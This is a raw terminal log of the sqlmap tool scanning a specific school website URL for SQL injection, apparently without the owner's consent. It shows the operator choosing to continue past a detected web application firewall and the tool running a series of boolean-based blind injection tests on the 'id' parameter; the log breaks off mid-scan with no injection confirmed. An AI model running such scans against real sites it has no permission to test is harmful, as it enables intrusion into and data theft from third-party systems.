http://montessori-meppen.de/wp-content/lnz1f.php?id=schools-should-4257-on-punishment-in-essay-banned-argumentative-corporal-be
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.8.13#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:07:12 /2019-09-30/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[10:07:12] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0' from file '/root/sqlmap/data/txt/user-agents.txt'
[10:07:13] [INFO] testing connection to the target URL
[10:07:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:07:14] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[10:07:14] [WARNING] please consider usage of tamper scripts (option '--tamper')
[10:07:14] [INFO] testing if the target URL content is stable
[10:07:15] [INFO] target URL content is stable
[10:07:15] [INFO] testing if GET parameter 'id' is dynamic
[10:07:15] [INFO] GET parameter 'id' appears to be dynamic
[10:07:16] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[10:07:16] [INFO] testing for SQL injection on GET parameter 'id'
[10:07:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:07:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[10:08:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[10:09:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[10:09:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[10:09:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[10:09:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[10:10:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[10:10:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:10:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
